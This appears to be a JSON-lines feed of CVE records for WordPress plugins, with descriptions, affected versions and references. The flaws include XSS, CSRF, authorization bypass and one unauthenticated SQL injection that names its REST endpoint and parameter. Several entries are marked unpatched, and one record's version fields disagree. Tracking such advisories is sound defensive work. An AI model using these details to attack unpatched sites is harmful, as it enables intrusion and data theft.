{"CVE_ID":"CVE-2025-2893","slug":"gutenverse","versionImpact":"2.2.1","description":"The Gutenverse \u2013 Ultimate Block Addons and Page Builder for Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's countdown Block in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse\\\/tags\\\/2.2.1\\\/assets\\\/js\\\/blocks.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse\\\/tags\\\/2.2.1\\\/assets\\\/js\\\/blocks.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281650\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281650\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/690e7f00-d9db-4912-9438-7fcbcb026800?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/690e7f00-d9db-4912-9438-7fcbcb026800?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5568","slug":"mage-eventpress","versionImpact":"4.4.2","description":"The WpEvently plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/magepeopleteam\\\/mage-eventpress\\\/commit\\\/c6f8d3233087881d3eb7ed3ebe9a6ebc7795f144\",\"name\":\"https:\\\/\\\/github.com\\\/magepeopleteam\\\/mage-eventpress\\\/commit\\\/c6f8d3233087881d3eb7ed3ebe9a6ebc7795f144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307484\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307484\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mage-eventpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mage-eventpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3659c4d-3a19-4f74-9f6d-26d7b24ebe56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3659c4d-3a19-4f74-9f6d-26d7b24ebe56?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0942","slug":"woocommerce-for-japan","versionImpact":"2.5.4","description":"The Japanized For WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-for-japan\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-setting-screen.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-for-japan\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-setting-screen.php#L63\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb606a30-2f7c-41e9-9ebc-9f1b0b84fff8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb606a30-2f7c-41e9-9ebc-9f1b0b84fff8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4364","slug":"wp-jobsearch","versionImpact":"1.8.1","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the jobsearch_add_job_import_schedule_call() function in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers to add and\/or modify schedule calls.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9114018f-0678-4973-bb1e-932f0d93f963?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9114018f-0678-4973-bb1e-932f0d93f963?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2dd5df-f758-419c-bfb8-b8e53235fede\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2dd5df-f758-419c-bfb8-b8e53235fede\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4402","slug":"multiple-roles","versionImpact":"1.3.1","description":"The Multiple Roles plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the mu_add_roles_in_signup_meta() and mu_add_roles_in_signup_meta_recently() functions. This makes it possible for unauthenticated attackers to add additional roles to users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862fa0c3-c16f-493e-9bf6-92debc0e30f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862fa0c3-c16f-493e-9bf6-92debc0e30f6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2556328%40multiple-roles&new=2556328%40multiple-roles&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2556328%40multiple-roles&new=2556328%40multiple-roles&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1366","slug":"happy-elementor-addons","versionImpact":"3.10.3","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018archive_title_tag\u2019 attribute of the Archive Title widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4530","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing card categories via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/952f6b5c-7728-4c87-8826-6b493f51a979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/952f6b5c-7728-4c87-8826-6b493f51a979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6629","slug":"all-in-one-video-gallery","versionImpact":"3.7.1","description":"The All-in-One Video Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video shortcode in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e6fda8-e998-4087-8a21-9edb2a0249c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e6fda8-e998-4087-8a21-9edb2a0249c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-in-one-video-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-in-one-video-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8484","slug":"rest-api-to-miniprogram","versionImpact":"4.7.1","description":"The REST API TO MiniProgram plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the \/wp-json\/watch-life-net\/v1\/comment\/getcomments REST API endpoint in all versions up to, and including, 4.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e0945eb-ceec-4536-822a-fe864c21b580?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e0945eb-ceec-4536-822a-fe864c21b580?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-comments-controller.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-comments-controller.php#L247\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9502","slug":"master-addons","versionImpact":"2.0.6.7","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Tooltip module in all versions up to, and including, 2.0.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"name\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tooltip\\\/ma-tooltip.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tooltip\\\/ma-tooltip.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211489\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/485c9ee6-9cb5-45ca-86af-ee5d10ee6734?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/485c9ee6-9cb5-45ca-86af-ee5d10ee6734?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31562","slug":"uptime-robot-monitor","versionImpact":"2.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aphotrax Uptime Robot Plugin for WordPress allows DOM-Based XSS. This issue affects Uptime Robot Plugin for WordPress: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12750","slug":"competition-form","versionImpact":"2.0","description":"The Competition Form WordPress plugin through 2.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3570bdc-659f-4a03-96f8-b4f9f045f910\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3570bdc-659f-4a03-96f8-b4f9f045f910\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4363","slug":"wp-quick-front-end-editor","versionImpact":"5.5","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 5.5 due to insufficient input sanitization and output escaping on the 'save_content_front' function that uses print_r on the user-supplied $_REQUEST values. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ce8ae7d-c2a5-4da3-8bdd-20dfdb5ce700?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ce8ae7d-c2a5-4da3-8bdd-20dfdb5ce700?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4401","slug":"analogwp-templates","versionImpact":"1.8.0","description":"The Style Kits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.0. This is due to missing or incorrect nonce validation on the update_posts_stylekit() function. This makes it possible for unauthenticated attackers to update style kits for posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473676\\\/analogwp-templates\\\/trunk\\\/inc\\\/class-quick-edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473676\\\/analogwp-templates\\\/trunk\\\/inc\\\/class-quick-edit.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cb08fc1-fb8b-4478-8569-eb9b28aff50b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cb08fc1-fb8b-4478-8569-eb9b28aff50b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5653","slug":"wassup","versionImpact":"1.9.4.5","description":"The WassUp Real Time Analytics WordPress plugin through 1.9.4.5 does not escape IP address provided via some headers before outputting them back in an admin page, allowing unauthenticated users to perform Stored XSS attacks against logged in admins","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76316621-1987-44ea-83e5-6ca884bdd1c0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76316621-1987-44ea-83e5-6ca884bdd1c0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1170","slug":"buddyforms","versionImpact":"2.8.7","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the handle_deleted_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to delete arbitrary media files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4529","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as deleting card categories via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/082ff0b8-2ecd-4292-832d-0a79e1ba8cb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/082ff0b8-2ecd-4292-832d-0a79e1ba8cb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5787","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.20","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's Link Effects widget in all versions up to, and including, 2.7.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce55230e-8c9e-41aa-b107-16c5988d1feb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce55230e-8c9e-41aa-b107-16c5988d1feb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.20\\\/modules\\\/link-effects\\\/widgets\\\/link-effects.php#L482\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.20\\\/modules\\\/link-effects\\\/widgets\\\/link-effects.php#L482\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101651\\\/#file331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101651\\\/#file331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpack-lite-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpack-lite-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54213","slug":"zionbuilder","versionImpact":"3.6.14","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zionbuilder.io WordPress Page Builder \u2013 Zion Builder allows Stored XSS. This issue affects WordPress Page Builder \u2013 Zion Builder: from n\/a through 3.6.12.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zionbuilder\\\/vulnerability\\\/wordpress-wordpress-page-builder-zion-builder-plugin-3-6-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zionbuilder\\\/vulnerability\\\/wordpress-wordpress-page-builder-zion-builder-plugin-3-6-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
